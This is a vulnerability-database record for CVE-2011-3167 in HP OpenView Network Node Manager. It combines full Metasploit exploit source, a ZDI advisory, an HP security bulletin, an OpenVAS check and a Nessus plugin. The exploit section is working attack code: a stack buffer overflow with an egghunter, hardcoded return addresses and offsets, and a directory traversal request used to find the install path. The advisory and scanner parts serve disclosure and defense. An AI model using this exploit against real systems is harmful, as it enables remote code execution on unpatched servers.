rand_text_numeric(3)\n my_cookie = \"OvOSLocale=English_United States.1252; \"\n my_cookie << 
\"OvAcceptLang=en-US; \"\n my_cookie << \"OvJavaLocale=en_US.Cp1252; \"\n my_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\n\n cgi = '/OvCgi/webappmon.exe'\n\n res = send_request_cgi({\n 'uri' => cgi,\n 'cookie' => my_cookie,\n 'method' => \"POST\",\n 'vars_post' =>\n {\n 'ins' => 'nowait',\n 'sel' => rand_text_alphanumeric(15),\n 'app' => 'IP Tables',\n 'act' => 'Services',\n 'help' => '',\n 'cache' => rand_text_numeric(4)\n },\n 'data' => \"arg=#{buf}\" # Avoid uri encoding\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n end\n\n handler\n\n end\nend\n\n=begin\n\n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3\n\nmeterpreter > run post/windows/manage/migrate\n\n[*] Running module against HOME-F006222D6C\n[*] Current server process: webappmon.exe (7064)\n[*] Spawning notepad.exe process to migrate to\n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.\n[-] Call stack:\n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'\n[-] (eval):80:in `create_temp_proc'\n[-] (eval):49:in `run'\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "published": "2012-01-20T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2012-01-20T00:00:00", "id": "PACKETSTORM:108874", "href": "https://packetstormsecurity.com/files/108874/HP-OpenView-Network-Node-Manager-ov.dll-_OVBuildPath-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and 
commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Egghunter \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node \nManager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long \n'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can \ncause a stack-based buffer overflow and execute arbitrary code. \n \nThe vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There \nare no stack cookies, so exploitation is achieved by overwriting the saved return \naddress. \n \nThe vulnerability is due to the use of the function \"_OVConcatPath\" which finally \nuses \"strcat\" in a insecure way. User controlled data is concatenated to a string \nwhich contains the OpenView installation path. \n \nTo achieve reliable exploitation a directory traversal in OpenView5.exe \n(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation \npath. If the installation path cannot be guessed the default installation path \nis used. 
\n} , \n'Author' => \n[ \n'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit fu \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-3167' ], \n[ 'OSVDB', '76775' ], \n[ 'BID', '50471' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ], \n[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ] \n], \n'Payload' => \n{ \n'Space' => 950, \n'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"), \n'DisableNops' => true, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'EDI' # Egghunter jmp edi \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3', \n# Patches installed: \n# * ECS_00048 \n# * NNM_01128 \n# * NNM_01172 \n# * NNM_01187 \n{ \n'Offset' => 1067, \n'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002) \n'JmpESP' => 0x5a4251c5, # call esp - in ov.dll \n'EggAdjust' => 4, \n'ReadableAddress' => 0x5a466930 # ov.dll \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 01 2011')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \n# The following code allows to migrate if having into account \n# that over Windows XP permissions aren't granted on %windir%\\system32 \n# \n# Code ripped from \"modules/post/windows/manage/migrate.rb\". 
See it \n# for more information \ndef on_new_session(client) \n \nif client.type != \"meterpreter\" \nprint_error(\"NOTE: you must use a meterpreter payload in order to process migration.\") \nreturn \nend \n \nclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\") \n \n# Select path and executable to run depending the architecture \n# and the operating system \nif client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/ \nwindir = client.fs.file.expand_path(\"%ProgramFiles%\") \ncmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\" \nelse # Windows 2000 \nwindir = client.fs.file.expand_path(\"%windir%\") \nif client.sys.config.sysinfo['Architecture'] =~ /x86/ \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\" \nend \nend \n \n# run hidden \nprint_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\") \nproc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) \ntarget_pid = proc.pid \n \nbegin \nprint_good(\"Migrating to #{target_pid}\") \nclient.core.migrate(target_pid) \nprint_good(\"Successfully migrated to process #{target_pid}\") \nrescue ::Exception => e \nprint_error(\"Could not migrate in to process.\") \nprint_error(e.to_s) \nend \n \nend \n \n# Tries to guess the HP OpenView install dir via the Directory traversal identified \n# by OSVDB 44359. \n# If OSVDB 44359 doesn't allow to retrieve the installation path the default one \n# (C:\\Program Files\\HP OpenView\\) is used. 
\n# Directory Traversal used: \n# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log \ndef get_install_path \n \ncgi = '/OvCgi/OpenView5.exe' \nweb_session = rand_text_numeric(3) \nmy_cookie = \"OvOSLocale=English_United States.1252; \" \nmy_cookie << \"OvAcceptLang=en-US; \" \nmy_cookie << \"OvJavaLocale=en_US.Cp1252; \" \nmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\" \n \npayload = \"../../../log/setup.log\" \nres = send_request_cgi({ \n'uri' => cgi, \n'cookie' => my_cookie, \n'method' => \"GET\", \n'vars_get' => \n{ \n'Target' => \"Main\", \n'Scope' => \"Snmp\", \n'Action' => payload \n} \n}, 5) \n \ninstallation_path = \"\" \nif res and res.code == 200 and \nres.body =~ /([A-Z]:\\\\.*\\\\)log/ \nprint_status(\"Installation Path Found in #{$1}\") \ninstallation_path = $1 \nelse \nprint_status(\"Installation Path Not Found using the default\") \ninstallation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\" \nend \n \nreturn installation_path \nend \n \ndef exploit \nprint_status(\"Trying target #{target.name}...\") \n \ninstall_path = get_install_path \ninstall_path << \"help\\\\English_United States.1252\" \n \neggoptions = { \n:checksum => true, \n} \nhunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) \n \n[ 'x86/alpha_mixed'].each { |name| \nenc = framework.encoders.create(name) \nif name =~/alpha/ \n# If control is transferred to the decoder via \"call esp\" BufferOfset \n# shoulds be adjusted. 
\nif target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0 \nenc_options = { \n'BufferRegister' => 'ESP', \n'BufferOffset' => target[\"EggAdjust\"] \n} \nenc.datastore.import_options_from_hash(enc_options) \nelse \nenc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) \nend \nend \nhunter = enc.encode(hunter, nil, nil, platform) \n} \n \noffset = target['Offset'] - install_path.length - egg.length \n \nmy_payload = egg \nmy_payload << rand_text_alphanumeric(offset) \nmy_payload << [target.ret].pack(\"V\") \nmy_payload << rand_text_alphanumeric(4) # Padding \nmy_payload << [target[\"ReadableAddress\"]].pack(\"V\") \nmy_payload << [target[\"JmpESP\"]].pack(\"V\") \nmy_payload << hunter \n \nbuf = \"-textFile+#{my_payload}+++++++++++++++++++++++\" \nbuf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\" \nbuf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\" \nbuf << \"-dataLine+2+\" \nbuf << \"-commandTitle+%22Services%22+%09%09++++++\" \nbuf << \"-iconName+%22Services%22+++++++++++++++++++++++\" \nbuf << \"-cmd+rnetstat+\" \nbuf << \"-S\" \n \nweb_session = rand_text_numeric(3) \nmy_cookie = \"OvOSLocale=English_United States.1252; \" \nmy_cookie << \"OvAcceptLang=en-US; \" \nmy_cookie << \"OvJavaLocale=en_US.Cp1252; \" \nmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\" \n \ncgi = '/OvCgi/webappmon.exe' \n \nres = send_request_cgi({ \n'uri' => cgi, \n'cookie' => my_cookie, \n'method' => \"POST\", \n'vars_post' => \n{ \n'ins' => 'nowait', \n'sel' => rand_text_alphanumeric(15), \n'app' => 'IP Tables', \n'act' => 'Services', \n'help' => '', \n'cache' => rand_text_numeric(4) \n}, \n'data' => \"arg=#{buf}\" # Avoid uri encoding \n}, 3) \n \nif res and res.code != 502 \nprint_error(\"Eek! 
We weren't expecting a response, but we got one\") \nif datastore['DEBUG'] \nprint_line() \nprint_error(res.inspect) \nend \nend \n \nhandler \n \nend \n \nend \n \n=begin \n \n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3 \n \nmeterpreter > run post/windows/manage/migrate \n \n[*] Running module against HOME-F006222D6C \n[*] Current server process: webappmon.exe (7064) \n[*] Spawning notepad.exe process to migrate to \n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. \n[-] Call stack: \n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute' \n[-] (eval):80:in `create_temp_proc' \n[-] (eval):49:in `run' \n=end`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108874/hp_nnm_ovbuildpath_textfile.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-3167"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-002 : HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-002\r\nJanuary 5, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2011-3167\r\n\r\n- -- CVSS:\r\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nHewlett-Packard\r\n\r\n\r\n\r\n- -- Affected Products:\r\n\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11952.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of OpenView 
Network Node Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within ov.dll. When processing a user supplied\r\nfile name for the textFile option, there exists an insufficient boundary\r\ncheck before supplying the value to a format string within _OVBuildPath,\r\ncausing a stack overflow. This can lead to memory corruption which can\r\nbe leveraged to execute arbitrary code under the context of the target\r\nservice.\r\n\r\n- -- Vendor Response:\r\n\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052\r\n\r\n\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-05-12 - Vulnerability reported to vendor\r\n\r\n2012-01-05 - Coordinated public release of advisory\r\n\r\n\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* Aniway (Aniway.Anyway@gmail.com)\r\n\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.17 (MingW32)\r\n\r\niQEcBAEBAgAGBQJPBhGKAAoJEFVtgMGTo1sc9iMIAKQvY/dI3KyzEMtF9fFKwr0r\r\nhNN++wJsxKzXQP4DDmgRbnFbTOeg93x7ytaPxqcmxJRhjXqLIdnk8eevi/YNP8o5\r\nzqB19Ty4Oo+Ie0zI+ZAdkZODhilf76QL23k/HP4mB7F+IO0ZEQ7tJTQ5clxxJfni\r\nocugYsqbjII9TIAeAAEZnNKFmcYqq8AU7jwtcITk3m3cq2F3dsB8AKIvtYKd2rqY\r\n3PfvNGuFXxYP+qv95ijERoAY6XsiMFncmnIQ0oURMDMPsZUv7kgBcSYDJ+k6rZnW\r\nscRq7MZg+ATE0KgpDlN/EHEOx0r7bjCigs0oRiiffi7+62U3YjO/rMRUYiNZcZc=\r\n=SgJL\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-09T00:00:00", "published": "2012-01-09T00:00:00", "id": "SECURITYVULNS:DOC:27517", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27517", "title": "ZDI-12-002 : HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03054052\r\nVersion: 1\r\n\r\nHPSBMU02712 SSRT100649 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-11-01\r\nLast Updated: 2011-11-01\r\n\r\nPotential Security Impact: 
Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server.\r\n\r\nReferences: CVE-2011-3165 (ZDI-CAN-1208), CVE-2011-3166 (ZDI-CAN-1209), CVE-2011-3167 (ZDI-CAN-1210)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-3165 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2011-3166 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2011-3167 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Aniway.Anyway@gmail.com along with TippingPoint's Zero Day Initiative for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nOV NNM v7.53\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_42233 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_42232 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00121 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00122 or subsequent\r\n\r\nSolaris\r\n PSOV_03535 or subsequent\r\n\r\nWindows\r\n NNM_01213 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n 
Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nMANUAL ACTIONS: No\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patch listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 November 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = 
Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6v8csACgkQ4B86/C0qfVm3fgCg2GwzmrwM+5/sJSFhzBx1/HCg\r\n6asAoJjjvHr/FYV0zvdxCMWEm/NjmZ+x\r\n=NS88\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27279", "title": "[security bulletin] HPSBMU02712 SSRT100649 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "description": "No description provided", "edition": 1, "modified": "2012-01-09T00:00:00", "published": "2012-01-09T00:00:00", "id": "SECURITYVULNS:VULN:12023", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12023", "title": 
"HP OpenView Network Node Manager code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3166", "CVE-2011-3167"], "description": "HP OpenView Network Node Manager (NNM) is prone to multiple remote\n code-execution vulnerabilities because it fails to sanitize user-supplied data.", "modified": "2018-10-22T00:00:00", "published": "2011-12-14T00:00:00", "id": "OPENVAS:1361412562310103364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103364", "type": "openvas", "title": "HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_openview_nnm_50471.nasl 12018 2018-10-22 13:31:29Z mmartin $\n#\n# HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:openview_network_node_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103364\");\n script_bugtraq_id(50471);\n script_cve_id(\"CVE-2011-3166\", \"CVE-2011-3167\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12018 $\");\n script_name(\"HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 15:31:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-14 09:14:18 +0100 (Wed, 14 Dec 2011)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_hp_openview_nnm_detect.nasl\");\n script_require_ports(\"Services/www\", 7510);\n script_mandatory_keys(\"HP/OVNNM/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50471\");\n script_xref(name:\"URL\", value:\"http://www.openview.hp.com/products/nnm/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/520349\");\n\n script_tag(name:\"summary\", value:\"HP OpenView Network Node Manager (NNM) is prone to multiple remote\n code-execution vulnerabilities because it fails to sanitize user-supplied data.\");\n script_tag(name:\"affected\", value:\"These issues affects NNM 7.51, v7.53 running on HP-UX, Linux, Solaris,\n and Windows. 
Other versions and platforms may also be affected.\");\n script_tag(name:\"solution\", value:\"Updates are available.Please contact the vendor for more information.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to execute arbitrary code with\n the privileges of the user running the affected application.\n Successful exploits will compromise the affected application and\n possibly the underlying computer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_version( cpe:CPE, port:port );\nif( ! vers = get_kb_item( \"www/\"+ port + \"/HP/OVNNM/Ver\" ) ) exit( 0 );\n\nif( version_is_equal( version:vers, test_version:\"B.07.51\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.53\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T03:31:06", "description": "The installed version of HP Network Node Manager is affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists because\n the 'nnmRptConfig.exe' CGI application does not\n adequately validate user-supplied input. (CVE-2011-3165)\n\n - A remote code execution vulnerability exists within\n ov.dll. Insufficient boundary checking before supplying\n the value to a format string within _OVBuildPath can\n cause a stack overflow, leading to memory corruption,\n which could allow an attacker to execute arbitrary code\n within the context of the target service. (CVE-2011-3166)\n\n - A remote code execution vulnerability exists within the\n webappmon.exe CGI program. 
The vulnerability is due an\n insufficient boundary check before supplying a format\n string with the values. This causes a stack overflow,\n which can lead to memory corruption that can be\n exploited to execute arbitrary code within the context\n of the target service. (CVE-2011-3167)", "edition": 28, "published": "2012-03-28T00:00:00", "title": "HP OpenView Network Node Manager Multiple Code Execution Vulnerabilities (HPSBMU02712 SSRT100649)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:openview_network_node_manager", "cpe:/a:hp:openview_network_node_manager"], "id": "HP_NNM_MULTIPLE_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/58516", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58516);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2011-3165\", \"CVE-2011-3166\", \"CVE-2011-3167\");\n script_bugtraq_id(50471, 51049);\n\n script_name(english:\"HP OpenView Network Node Manager Multiple Code Execution Vulnerabilities (HPSBMU02712 SSRT100649)\");\n script_summary(english:\"Checks NNM version & patch level\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of HP Network Node Manager running on the remote host is\naffected by multiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of HP Network Node Manager is affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists because\n the 'nnmRptConfig.exe' CGI application does not\n adequately validate user-supplied input. (CVE-2011-3165)\n\n - A remote code execution vulnerability exists within\n ov.dll. 
Insufficient boundary checking before supplying\n the value to a format string within _OVBuildPath can\n cause a stack overflow, leading to memory corruption,\n which could allow an attacker to execute arbitrary code\n within the context of the target service. (CVE-2011-3166)\n\n - A remote code execution vulnerability exists within the\n webappmon.exe CGI program. The vulnerability is due an\n insufficient boundary check before supplying a format\n string with the values. This causes a stack overflow,\n which can lead to memory corruption that can be\n exploited to execute arbitrary code within the context\n of the target service. (CVE-2011-3167)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-348/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-002/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-003/\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03054052-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?02dda619\");\n 